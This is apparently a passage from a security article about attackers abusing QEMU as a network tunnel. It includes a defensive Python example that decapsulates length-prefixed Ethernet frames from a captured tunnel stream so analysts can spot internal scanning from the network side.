QEMU does not encrypt tunneled traffic: it sends the encapsulated packets in the clear. Each packet consists of the Ethernet frame size followed by the frame itself.
Stripping those headers from intercepted traffic recovers the tunneled frames. Still, threat actors use legitimate tools ingeniously.
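Because the tunnel carries length-prefixed Ethernet frames in the clear, a capture of the TCP session can be turned back into frames with a few lines of code, which is what makes network-side inspection of such a tunnel practical. The following added example (written for this article, not code from Kaspersky, Securelist or QEMU) does that decapsulation and summarizes each frame by MAC addresses and EtherType, ignoring a truncated record at the end of a cut-off capture. It assumes the framing used by QEMU’s stream socket backend, a 4-byte big-endian length followed by the raw frame; the sample stream, MAC addresses and payload bytes are constructed.

```python
import struct

ETHERTYPES = {0x0800: "IPv4", 0x0806: "ARP", 0x86DD: "IPv6"}


def encapsulate(frame):
    """Wrap one Ethernet frame the way QEMU's stream socket backend does
    (assumed here: 4-byte big-endian length, then the raw frame)."""
    return struct.pack("!I", len(frame)) + frame


def iter_frames(stream):
    """Yield raw Ethernet frames from a captured tunnel byte stream.
    A trailing partial record (cut-off capture) is dropped rather than mis-parsed."""
    off = 0
    while off + 4 <= len(stream):
        (length,) = struct.unpack_from("!I", stream, off)
        if length == 0 or length > 65535 or off + 4 + length > len(stream):
            break
        yield stream[off + 4 : off + 4 + length]
        off += 4 + length


def parse_ethernet(frame):
    """Split a frame into its 14-byte Ethernet II header fields plus payload length."""
    if len(frame) < 14:
        raise ValueError("runt frame")
    dst, src = frame[0:6], frame[6:12]
    (ethertype,) = struct.unpack_from("!H", frame, 12)
    return {
        "dst": dst.hex(":"),
        "src": src.hex(":"),
        "ethertype": ethertype,
        "proto": ETHERTYPES.get(ethertype, f"0x{ethertype:04x}"),
        "payload_len": len(frame) - 14,
    }


def summarize_tunnel(stream):
    """One summary dict per complete frame in the captured stream."""
    return [parse_ethernet(f) for f in iter_frames(stream)]


# Constructed sample: two frames as the tunnel would carry them, then a
# truncated record. Addresses are made up; the IPv4 payload is filler bytes,
# not a real packet.
_MAC_A = bytes.fromhex("525400aabb01")
_MAC_B = bytes.fromhex("525400aabb02")
_ARP = _MAC_A + _MAC_B + b"\x08\x06" + bytes(28)
_IP4 = _MAC_B + _MAC_A + b"\x08\x00" + bytes(range(40))
SAMPLE_STREAM = encapsulate(_ARP) + encapsulate(_IP4) + b"\x00\x00\x00\x10\xde\xad"

if __name__ == "__main__":
    for summary in summarize_tunnel(SAMPLE_STREAM):
        print(summary)
```

Feeding the reassembled TCP payload of the suspected session into `summarize_tunnel` gives the same frame list a sniffer on the pivot host would see; a sudden run of ARP and TCP SYN frames towards many addresses on the internal subnet is the scan the report describes, visible from the network side without touching the compromised host.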
Multi-level protection, with endpoint and network monitoring by SOC experts, is crucial for timely detection of anomalies and blocking of attacks, and an MDR service can detect suspicious QEMU activity.